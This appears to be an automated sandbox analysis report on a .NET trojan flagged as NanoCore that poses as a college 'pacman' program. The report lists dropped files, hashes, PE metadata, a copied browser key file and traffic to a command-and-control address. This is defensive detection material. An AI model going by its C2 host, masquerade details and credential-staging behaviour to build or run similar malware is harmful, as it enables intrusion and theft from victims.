                        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                        Process:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1856
                        Entropy (8bit):7.024371743172393
                        Encrypted:false
                        SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrw8:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
                        MD5:838CD9DBC78EA45A5406EAE23962086D
                        SHA1:C8273AACDEE03AC0CDCDDBAA83F51D04D6A4203C
                        SHA-256:6E11A62511C5BBC0413128305069B780C448684B54FAA3E8DD0B4FD3DB8C9867
                        SHA-512:F7D25EF1FA6F50667DD6785CC774E0AA6BC52A2231FE96E7C59D14EFDFDDA076F6399288CF6EAC8EFA8A75727893432AA155DA0E392F8CD1F26C5C5871EAC6B5
                        Malicious:false
                        Reputation:unknown
                        Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                        Process:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8
                        Entropy (8bit):2.75
                        Encrypted:false
                        SSDEEP:3:Wh8t:08
                        MD5:E48AF3B9C19137DE3D4E19DBEF794B54
                        SHA1:6C7EAF31502874EAD026A9A3D1778CF143198C1A
                        SHA-256:6BDB6E6649C8B4CBD53189D0099AF4A4C7C51416CB6038B228FCEAEBFDCE2DDA
                        SHA-512:5947A96EADF7260CAF9FDE0D0E2415AE58AAE54B48E9CAD686A3AD165BB19A025DB25C95595ADF515BDAC2129C54598B95B4E0F0653A87AE1A1490B0D570A8B2
                        Malicious:true
                        Reputation:unknown
                        Preview: .....U.H
                        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                        Process:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):40
                        Entropy (8bit):5.153055907333276
                        Encrypted:false
                        SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                        MD5:4E5E92E2369688041CC82EF9650EDED2
                        SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                        SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                        SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                        Malicious:false
                        Reputation:unknown
                        Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                        Process:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):327432
                        Entropy (8bit):7.99938831605763
                        Encrypted:true
                        SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                        MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                        SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                        SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                        SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                        Malicious:false
                        Reputation:unknown
                        Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                        C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        Process:C:\ProgramData\images.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1378816
                        Entropy (8bit):7.548476087877472
                        Encrypted:false
                        SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                        MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                        SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                        SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                        SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 20%
                        Reputation:unknown
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                        C:\Users\user\AppData\Roaming\kDIaJxw.tmp
                        Process:C:\ProgramData\images.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):87165
                        Entropy (8bit):6.102565506017432
                        Encrypted:false
                        SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                        MD5:CC02ABB348037609ED09EC9157D55234
                        SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                        SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                        SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                        Malicious:false
                        Reputation:unknown
                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                        C:\Users\user\AppData\Roaming\sGwItoz.tmp
                        Process:C:\ProgramData\images.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.792852251086831
                        Encrypted:false
                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                        Malicious:false
                        Reputation:unknown
                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.518165195771859
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:Xjf4yH9N2t.exe
                        File size:1309184
                        MD5:2318b60075e442cb6141535e268e4df0
                        SHA1:6d2e6e0bfdb0e649e0079533ecdbe302ff9dc8b5
                        SHA256:cdbe67339a29bfe3066a18b4e68e9b19e28e449ab21ce23a85ed15e04c5255df
                        SHA512:160013eed136f4db2f3ab2b662e62966daa6959c3ff5dbb8125e3e49f8d41e63ca5ca65ffe5f85370e27c39870bfe3d2dc3f09d629665b59e71e7c32a5c94413
                        SSDEEP:24576:HCIH76DO6fx8Dgyfx8Dgxz2MqBSYe6bOnb7IwDZN2L:pH76X58Dgy58DgxiMdYe6qnb7/Z4
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b..a..............P..............<... ...@....@.. .......................@............@................................

                        File Icon

                        Icon Hash:b07968fcd4ec7090

                        Static PE Info

                        General

                        Entrypoint:0x533cca
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61079A62 [Mon Aug 2 07:10:26 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x133c780x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1340000xd628.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1420000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x131cd00x131e00False0.70481871935data7.55041675876IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x1340000xd6280xd800False0.708423755787data6.59756750685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x1420000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x1342000x2e8data
                        RT_ICON0x1344f80x128GLS_BINARY_LSB_FIRST
                        RT_ICON0x1346300xea8data
                        RT_ICON0x1354e80x8a8data
                        RT_ICON0x135da00x568GLS_BINARY_LSB_FIRST
                        RT_ICON0x1363180x7228PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                        RT_ICON0x13d5500x25a8data
                        RT_ICON0x13fb080x10a8data
                        RT_ICON0x140bc00x468GLS_BINARY_LSB_FIRST
                        RT_GROUP_ICON0x1410380x84data
                        RT_VERSION0x1410cc0x35cdata
                        RT_MANIFEST0x1414380x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright Casper College 2009
                        Assembly Version1.0.0.0
                        InternalNameMdaHelp.exe
                        FileVersion1.0.0.0
                        CompanyNameCasper College
                        LegalTrademarks
                        Comments
                        ProductNamepacman2008_01
                        ProductVersion1.0.0.0
                        FileDescriptionpacman2008_01
                        OriginalFilenameMdaHelp.exe

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        08/02/21-10:18:17.690401TCP2025019ET TROJAN Possible NanoCore C2 60B497388234192.168.2.3203.159.80.186
                        08/02/21-10:18:24.066201TCP2025019ET TROJAN Possible NanoCore C2 60B497398234192.168.2.3203.159.80.186
                        08/02/21-10:18:30.089540TCP2025019ET TROJAN Possible NanoCore C2 60B497408234192.168.2.3203.159.80.186
                        08/02/21-10:18:36.366088TCP2025019ET TROJAN Possible NanoCore C2 60B497418234192.168.2.3203.159.80.186
                        08/02/21-10:18:43.127266TCP2025019ET TROJAN Possible NanoCore C2 60B497448234192.168.2.3203.159.80.186
                        08/02/21-10:18:49.312084TCP2025019ET TROJAN Possible NanoCore C2 60B497458234192.168.2.3203.159.80.186
                        08/02/21-10:18:54.302993TCP2025019ET TROJAN Possible NanoCore C2 60B497468234192.168.2.3203.159.80.186
                        08/02/21-10:19:01.430873TCP2025019ET TROJAN Possible NanoCore C2 60B497478234192.168.2.3203.159.80.186
                        08/02/21-10:19:08.624919TCP2025019ET TROJAN Possible NanoCore C2 60B497488234192.168.2.3203.159.80.186

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 2, 2021 10:17:46.562640905 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:46.591439009 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:46.593240976 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:46.650010109 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:46.692487001 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:46.876734972 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:46.969621897 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:46.969803095 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.056157112 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.126133919 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.127099991 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.130064964 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.178797960 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.232239008 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.232425928 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.232605934 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.232635975 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.232759953 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.232883930 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.262260914 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.262357950 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.262489080 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.262505054 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.262566090 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.262646914 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.264136076 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.264290094 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.264415026 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.264425039 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.264558077 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.264669895 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.291759968 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.291800976 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.291830063 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.291857958 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.291933060 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.291958094 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.292027950 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.292092085 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.292133093 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.292171001 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.292196035 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.292279005 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.293761015 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.293806076 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.293843031 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.293880939 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.293900967 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.293924093 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.293951035 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.293966055 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.294003963 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.294030905 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.294039965 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.294217110 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.321932077 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.321990013 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322037935 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322079897 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322098017 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.322118998 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322156906 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322156906 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.322194099 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322205067 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.322231054 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322269917 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322307110 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322354078 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322360039 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.322396040 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322432995 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322451115 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.322474957 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322511911 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322547913 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.322570086 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.322609901 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.327577114 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327625036 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327666998 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327702999 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327740908 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327783108 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327800989 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.327820063 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327857971 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327894926 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327905893 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.327915907 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.327939987 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327984095 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.327997923 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.328018904 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.328057051 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.328094006 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.328111887 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.328130960 CEST670349727203.159.80.186192.168.2.3
                        Aug 2, 2021 10:17:47.328136921 CEST497276703192.168.2.3203.159.80.186
                        Aug 2, 2021 10:17:47.328169107 CEST670349727203.159.80.186192.168.2.3

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 2, 2021 10:16:52.014514923 CEST5598453192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:52.039331913 CEST53559848.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:52.640094042 CEST6418553192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:52.666322947 CEST53641858.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:53.255062103 CEST6511053192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:53.288430929 CEST53651108.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:53.923527002 CEST5836153192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:53.950793028 CEST53583618.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:54.407705069 CEST6349253192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:54.443326950 CEST53634928.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:54.540355921 CEST6083153192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:54.565512896 CEST53608318.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:55.196198940 CEST6010053192.168.2.38.8.8.8
